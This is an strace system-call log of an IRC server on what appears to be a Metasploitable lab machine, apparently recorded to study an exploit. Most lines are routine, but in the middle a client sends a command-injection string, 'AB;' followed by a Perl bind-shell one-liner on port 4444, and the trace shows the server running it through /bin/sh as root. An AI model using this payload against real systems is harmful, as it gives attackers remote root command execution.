4519  07:34:23.248240 select(1024, [2 3 4 7 9], [], NULL, {0, 890000}) = 1 (in [9], left {0, 850000})

4519  07:34:23.284883 clock_gettime(CLOCK_MONOTONIC, {2473, 101902882}) = 0

4519  07:34:23.284904 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:34:23.284933 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.284951 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.284966 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.284980 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.284993 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285007 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285020 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285034 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285047 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285061 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285074 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285087 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285100 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285114 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285127 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285140 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285154 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285167 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285180 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285194 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285209 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285222 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.285237 time(NULL)        = 1495625663

4519  07:34:23.285276 time(NULL)        = 1495625663

4519  07:34:23.285293 gettimeofday({1495625663, 285297}, NULL) = 0

4519  07:34:23.285322 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:34:23.285351 clock_gettime(CLOCK_MONOTONIC, {2473, 102363890}) = 0

4519  07:34:23.285361 gettimeofday({1495625663, 285365}, NULL) = 0

4519  07:34:23.285372 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 870000})

4519  07:34:23.420875 clock_gettime(CLOCK_MONOTONIC, {2473, 237898375}) = 0

4519  07:34:23.420900 accept(2, 0, NULL) = 5

4519  07:34:23.420923 getpeername(5, {sa_family=AF_INET, sin_port=htons(37813), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:34:23.420956 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:34:23.420969 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:34:23.420982 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:34:23.420995 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:34:23.421007 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:34:23.421018 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:34:23.421031 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:34:23.421053 clock_gettime(CLOCK_MONOTONIC, {2473, 238066829}) = 0

4519  07:34:23.421065 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:34:23.421078 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:34:23.421087 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:34:23.421097 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:34:23.421108 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:34:23.421133 send(6, "Y\10\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:34:23.421208 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:34:23.421308 gettimeofday({1495625663, 421316}, NULL) = 0

4519  07:34:23.421326 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:34:23.426945 clock_gettime(CLOCK_MONOTONIC, {2473, 243962937}) = 0

4519  07:34:23.426963 recvfrom(6, "Y\10\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\317\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:34:23.427004 close(6)          = 0

4519  07:34:23.427020 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:34:23.427035 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:34:23.427093 time(NULL)        = 1495625663

4519  07:34:23.427106 time(NULL)        = 1495625663

4519  07:34:23.427118 gettimeofday({1495625663, 427122}, NULL) = 0

4519  07:34:23.427130 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:34:23.427159 clock_gettime(CLOCK_MONOTONIC, {2473, 244172134}) = 0

4519  07:34:23.427170 gettimeofday({1495625663, 427174}, NULL) = 0

4519  07:34:23.427181 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 890000})

4519  07:34:23.534946 clock_gettime(CLOCK_MONOTONIC, {2473, 351966362}) = 0

4519  07:34:23.534991 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:34:23.535069 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535122 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535151 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535165 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535179 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535193 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535206 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535220 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535233 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535246 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535259 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535283 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535297 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535311 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535324 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535338 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535351 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535365 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535378 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535392 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535405 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535419 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:23.535435 gettimeofday({1495625663, 535439}, NULL) = 0

4519  07:34:23.535454 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:34:23.535495 clock_gettime(CLOCK_MONOTONIC, {2473, 352507915}) = 0

4519  07:34:23.535507 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:34:23.535534 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:34:23.535555 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:34:23.535567 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:34:23.535583 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10736

10736 07:34:23.535658 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10736 07:34:23.535673 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10736 07:34:23.535684 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10736 07:34:23.535697 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10736 07:34:23.535830 brk(0)            = 0x80f9000

10736 07:34:23.535870 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.535887 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f45000

10736 07:34:23.535904 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.535921 open("/etc/ld.so.cache", O_RDONLY) = 1

10736 07:34:23.535934 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10736 07:34:23.535952 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f3d000

10736 07:34:23.535962 close(1)          = 0

10736 07:34:23.535973 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.535988 open("/lib/libncurses.so.5", O_RDONLY) = 1

10736 07:34:23.536001 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10736 07:34:23.536094 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10736 07:34:23.536111 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f0d000

10736 07:34:23.536123 mmap2(0xb7f3a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f3a000

10736 07:34:23.536140 close(1)          = 0

10736 07:34:23.536152 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.536166 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10736 07:34:23.536180 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10736 07:34:23.536271 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10736 07:34:23.536288 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f09000

10736 07:34:23.536329 mmap2(0xb7f0b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f0b000

10736 07:34:23.536362 close(1)          = 0

10736 07:34:23.536373 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.536387 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10736 07:34:23.536401 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10736 07:34:23.536488 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10736 07:34:23.536504 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f08000

10736 07:34:23.536518 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db9000

10736 07:34:23.536529 mmap2(0xb7f02000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f02000

10736 07:34:23.536544 mmap2(0xb7f05000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f05000

10736 07:34:23.536557 close(1)          = 0

10736 07:34:23.536580 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db8000

10736 07:34:23.536591 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db86b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10736 07:34:23.536646 mprotect(0xb7f02000, 4096, PROT_READ) = 0

10736 07:34:23.536682 munmap(0xb7f3d000, 29913) = 0

10736 07:34:23.536707 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10736 07:34:23.536721 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10736 07:34:23.536741 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb67d20) = -1 ENOTTY (Inappropriate ioctl for device)

10736 07:34:23.536770 brk(0)            = 0x80f9000

10736 07:34:23.536780 brk(0x80fa000)    = 0x80fa000

10736 07:34:23.536820 brk(0x80fb000)    = 0x80fb000

10736 07:34:23.536890 getuid32()        = 0

10736 07:34:23.536904 getgid32()        = 0

10736 07:34:23.536913 geteuid32()       = 0

10736 07:34:23.536922 getegid32()       = 0

10736 07:34:23.536936 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10736 07:34:23.536964 time(NULL)        = 1495625663

10736 07:34:23.536977 brk(0x80fc000)    = 0x80fc000

10736 07:34:23.536991 brk(0x80fd000)    = 0x80fd000

10736 07:34:23.537010 open("/proc/meminfo", O_RDONLY) = 1

10736 07:34:23.537032 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10736 07:34:23.537050 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f44000

10736 07:34:23.537061 read(1, "MemTotal:      1035240 kB\nMemFree:        401124 kB\nBuffers:         79064 kB\nCached:         395452 kB\nSwapCached:          0 kB\nActive:         256628 kB\nInactive:       346820 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        400884 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5132 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            19476 kB\nSReclaimable:    10868 kB\nSUnreclaim:       8608 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10736 07:34:23.537143 close(1)          = 0

10736 07:34:23.537154 munmap(0xb7f44000, 4096) = 0

10736 07:34:23.537166 brk(0x80fe000)    = 0x80fe000

10736 07:34:23.537191 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10736 07:34:23.537205 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10736 07:34:23.537216 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10736 07:34:23.537228 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10736 07:34:23.537240 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10736 07:34:23.537252 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10736 07:34:23.537265 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10736 07:34:23.537277 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10736 07:34:23.537290 uname({sys="Linux", node="metasploitable", ...}) = 0

10736 07:34:23.537383 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10736 07:34:23.537401 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10736 07:34:23.537419 brk(0x8100000)    = 0x8100000

10736 07:34:23.537431 getcwd("/etc/unreal", 4096) = 12

10736 07:34:23.537445 getpid()          = 10736

10736 07:34:23.537461 getppid()         = 4519

10736 07:34:23.537477 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10736 07:34:23.537496 stat64("/sbin/sh", 0xbfb67cf8) = -1 ENOENT (No such file or directory)

10736 07:34:23.537509 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10736 07:34:23.537526 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10736 07:34:23.537549 socket(PF_FILE, SOCK_STREAM, 0) = 1

10736 07:34:23.537563 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10736 07:34:23.537575 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10736 07:34:23.537596 close(1)          = 0

10736 07:34:23.537607 socket(PF_FILE, SOCK_STREAM, 0) = 1

10736 07:34:23.537617 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10736 07:34:23.537628 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10736 07:34:23.537645 close(1)          = 0

10736 07:34:23.537658 open("/etc/nsswitch.conf", O_RDONLY) = 1

10736 07:34:23.537673 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10736 07:34:23.537689 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f44000

10736 07:34:23.537700 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10736 07:34:23.537751 read(1, "", 4096) = 0

10736 07:34:23.537761 close(1)          = 0

10736 07:34:23.537770 munmap(0xb7f44000, 4096) = 0

10736 07:34:23.537786 open("/etc/ld.so.cache", O_RDONLY) = 1

10736 07:34:23.537845 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10736 07:34:23.537894 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f3d000

10736 07:34:23.537905 close(1)          = 0

10736 07:34:23.537916 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.537944 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10736 07:34:23.537959 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 